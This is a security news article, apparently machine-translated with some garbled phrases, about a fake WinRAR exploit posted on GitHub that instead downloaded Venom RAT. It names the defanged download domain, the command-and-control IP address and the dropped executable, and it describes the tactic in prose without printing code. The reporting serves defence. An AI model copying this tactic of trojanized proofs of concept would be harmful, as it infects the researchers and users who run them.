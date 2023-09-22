A “prankster” released a fake proof-of-concept (PoC) exploit for a recent WinRAR vulnerability on GitHub with the aim of infecting users who downloaded the code with the Venom RAT malware.

Where does WinRAR fake PoC come from

“The fake PoC created to exploit this WinRAR vulnerability was based on a publicly available PoC script that exploited a SQL injection vulnerability in an application called GeoServer, identified as CVE-2023-25157“, has declared Palo Alto Networks Unit 42 researcher Robert Falcone.

Although i Fake PoCs have become a well-documented tactic for in the cybersecurity environment, the Palo Alto cybersecurity firm, however, suspected that hackers were opportunistically trying to target other criminals who may be adopting the latest vulnerabilities in their arsenal.

whalersplonk, theGitHub account which hosted the repository, is no longer accessible, The PoC is believed to have been uploaded on August 21, 2023, four days after the vulnerability was made public.

CVE-2023-40477 concerns a improper validation in the WinRAR utility which could be exploited to achieve Remote Code Execution (RCE) on Windows systems. It was addressed last month by developers in WinRAR version 6.23, along with another actively exploited flaw identified as CVE-2023-38831.

How this WinRAR proof-of-concept is built at the code level

An analysis of the repository reveals a Python script and a video that was streaming on Github demonstrating how to use the exploit, the video, before the whalersplonk account was deleted, attracted a total of 121 views.

The Python script, instead of executing the PoC, contacts a remote server (checkblacklistwords[.]eu) to download an executable called Windows.Gaming.Preview.exewhich is a variant of Venom RATand has the ability to list running processes and receive commands from a server controlled by the attacker (94.156.253[.]109).

A closer look at the attack infrastructure shows that the threat actor created the checkblacklistwords domain[.]eu at least 10 days before the flaw was publicly disclosed and then quickly exploited the criticality of the bug to attract potential victims.

“An attacker [di origine] unknown attempted to compromise individuals by releasing a fake PoC after the vulnerability was publicly announced, in order to exploit a highly sought-after RCE vulnerability in WinRAR to compromise others“Falcone said, adding, “This PoC is fake and does not exploit the WinRAR vulnerability, suggesting that the actor attempted to exploit a highly sought-after RCE in WinRAR to compromise others.”

